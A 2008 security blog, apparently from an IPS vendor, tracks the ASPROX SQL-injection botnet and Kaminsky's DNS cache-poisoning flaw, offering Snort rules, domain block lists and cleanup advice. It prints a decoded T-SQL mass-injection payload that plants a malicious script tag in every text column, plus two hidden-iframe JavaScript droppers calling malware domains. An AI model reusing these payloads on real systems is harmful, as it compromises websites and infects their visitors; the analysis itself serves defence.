alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)

*** Update ***
New metasploit module out this morning which allows you to overwrite cache poisoning the NS record for an entire domain. This means if you have evil NS server to take requests you mass own entire domains such as google, microsoft, etc. Scary stuff.

http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html

Major DNS Flaw revealed

2008-07-22T10:47:00.000-07:00

The Security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.

Here is how it works (according to leak):

Malory wants to poison the server ns.polya.com

Malory sends NS requests for ulam00001.com, ulam00002.com … to ns.polya.com.

Malory then sends a forged answers, saying that the NS for http://www.ulam00002.com is ns.google.com *AND* puts a glue record saying that ns.google.com is 66.6.6.6

Because the glue records corresponds with the answer record, (same domain) the targetted nameserver will cache or replace it’s curent record of ns.google.com to be 66.6.6.6

http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html

Make sure to read the comments for details of the original leak (Matasano's blog), the drama is Matasano originally called BS on the flaw forcing Dan to back it up with a phone briefing. Thomas Ptacek then re-tracked his BS claims under the agreement he would keep quiet. Now the same guy leaked the technical details is attempting to apologize... What a jerk.

http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/

Updated ASPROX Toolkit

2008-07-22T09:44:00.001-07:00

We have a new tool kit available with the following important additions:

T-SQL code for cleaning infected databases.

URLScan configuration instructions for catching injection attempts.

click here to grab the new tool kit

ASPROX Domain Master List

2008-07-10T12:01:00.000-07:00

adwnetw.com, bnsdrv.com, butdrv.com, cdrpoex.com, crtbond.com, destad.mobi, drvadw.com, gbradw.com, loopadd.com, porttw.mobi, pyttco.com, tertad.mobi, usaadw.com, usabnr.com, apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com, tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn, app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com, nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com

ASPROX Botnet up to 16,500 Zombies

2008-07-10T11:42:00.000-07:00

Just a quick update, ASPROX is currently around 16,500 zombies up from 12k last week.

Get the updated IP list of the infected zombie hosts

And make sure to grab our ASPROX information toolkit

ASPROX Payload Morphed NGG.JS

2008-07-07T10:31:00.001-07:00

New domains found and new javascript payload "ngg.js" replaced the previous "b.js".

And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)

New SQL Injection Payload (HEX DECODED):


DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Whats in ngg.js? Familiar iframe attack from before but this time selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)


window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("updngg=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+11*3600*1000);
document.cookie = "updngg=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
}
catch(e)
{
};
}}

New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com

Snort signature to detect access of infected site:


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server;
uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

And finally go here to download Sentinel IPS' ASPROX Information Toolkit

ASPROX Botnet Fingerprinted: 11,816 Zombies

2008-07-03T14:17:00.000-07:00

Today at 2pm CST I launched a massive query on our widespread network of Sentinel IPS appliances pulling unique source IP's from the ASPROX SQL Injection attacks.

Now we have an idea of size, location of zombies and a giant block list which we have made available right here

**Update** This is a list of infected machines emanating the SQL Injection attacks, not the number of compromised ASP websites, which is much higher nearing 100,000.

Was fun to whip up this geo-map of ASPROX's zombies...

New ASPROX / SQL Injection Defense Tools

2008-07-02T12:52:00.000-07:00

ASPROX is not letting up, many of our clients are still seeing SQL Injection attacks blocked every 3-5 minutes on their Sentinel.

Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL Injection vulnerabilities. I highly recommend giving it a try kb-954476

Also HP released a free version of their web security auditing tool specifically to check for SQL Injection, it's called Scrawler and you can get it here

More ASPROX domains (they don't give up, do they?):

tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn

And finally we are still emailing our ASPROX Toolkit document which gives information on the attack and how to recover from it if you organization has been compromised.

Iframes and IE, vewwy vewwy bad...

2008-07-01T06:28:00.000-07:00

Response poured in from my last post wanting to know how Malware can be loaded from simply including an iframe (sourcing html from another site).

Well in case you too are wondering, MS never intended it to be that way....

See http://www.kb.cert.org/vuls/id/516627

New ASPROX domains: dl251.com

ASPROX SQL Compromised my website, now what?

2008-06-30T12:36:00.001-07:00

Many people are calling and emailing us for information about ASPROX and something most people seem to be unaware of is how this affects the visitors of your infected website?

So I will walk you through what happens:

Once your ASP website is compromised by the ASPROX SQL Injection you now host malware. A malicious piece of javascript "b.js" is loaded from one of the domains listed in my previous posts, the javascript creates a "asprox was here" cookie and opens a hidden 0 pixel iframe from yet another bad domain which is "the malware can of worms". These domains constantly rotate IP's (for protection from blocklisting) using fast flux dns.

Here is sample contents from the javascript (b.js):

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http//supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 /iframe");
}
catch(e)
{
};
}

The malware can vary but is typically a mishmash of exploits which target several recent browser based vulnerabilities in quicktime, adobe reader, flash and even AOL instant messenger. Once a vulnerable client goes to your site the malware is successfully loaded and not only becomes a zombie slave within the ASPROX botnet (the same hosts that attacked your webserver) it also installs various nefarious programs like a password stealer which defrauds you of your online accounts. Infected clients are reported to be sending out bank phishing emails as well.

So in short review for those who are not-so-technical...

if you have a website infected with ASPROX and not cleaned/updated/secured, your website is infecting and spreading malware to others who simply viewed your site in their browser

That means you have an obligation to address this problem immediately! Please contact us for the information packet on ASPROX defense today.

ASPROX SQL Injection Attacks cont.

2008-06-26T13:12:00.000-07:00

ASPROX continues to ravage the web, please contact us for the information packet we put together with defense suggestions.

New ASPROX malware domains: app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com

ASPROX SQL Injection Botnet and iFrame/Malware

2008-06-23T10:55:00.000-07:00

We first noticed this attack when one of our larger clients saw a barrage of SQL injection alerts in the report of their Sentinel IPS (6,000 in one week). We looked into and found the extremely clever attack which hides the SQL Injection payload in a hexidecimal string to evade IDS/IPS. Well our device caught the attack at the initial injection stage hence the hex evasion portion of the attack failed.

So what is the good news? Sentinel IPS our managed security product protects against this attack even before it reaches your webserver by catching the initial SQL injection. This means instant protection from this ASP/SQL Injection threat without having to re-write your ASP code over night.

Grab our ASPROX toolkit for information on cleaning and defending from this attack.

***UPDATE*** I met with Dallas US Secret Service office today and this issue is much more wide spread than we previously thought. We want to help so if you have any information for us or need assistance cleaning up this mess give us a call.

How do you know if your site was compromised? Check your ASP application with your browser by viewing source and seeing if their is javascript which loads an iframe containing any of the following domains:

***UPDATE*** Maybe faster to search for the string "/b.js"

nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com

SMB Firewall 2.0 - Open Source vs Commercial

2007-12-12T07:15:00.000-08:00

Many companies are updating their old firewalls or investigating newer "next gen" options with more features. I've recently helped customers evaluate these options and came up with some surprising results.

Cisco ASA5505 10user IPSEC ~$375

Netscreen 5gt 10user IPSEC ~$450

Sonicwall TZ170 10user IPSEC ~$400

3com/Tippingpoint X5 ~$600

While the quality of hardware is nice, I found the commercial offerings available for the small/medium sized business space is very limited in functionality and open source solution to be much more feature rich (and free!)

Lets review some of the options:

Pfsense - Very feature rich, easy to use and slick web based management (based on m0n0wall)

M0n0wall - Stable freebsd based firewall with all the basics + more such as QoS and Wifi AP support.

Shorewall - Linux based firewall packages with QoS and many other features

Matt Jonkman leaves Bleeding Edge Threats...

2007-12-06T11:19:00.000-08:00

Understand this has been over blogged, but for us Snort ninjas and open source lovers who have seen the evolution of community driven Snort rules are very worried, why is this?

Because having a secure network should not be like healthcare, everyone should have free access to protection and bleeding edge threats was on the forefront of providing this.

Well Matt good luck my friend and thanks for all you have done, I am skeptical that the site will continue to flourish as it was your hardwork that made it the quality security resource it is.

That being said Snort 2.8.x is amazing and new attack signatures will have to be submitted somewhere, the question is will a new community portal arise to take the torch from Bleeding Edge?

Original post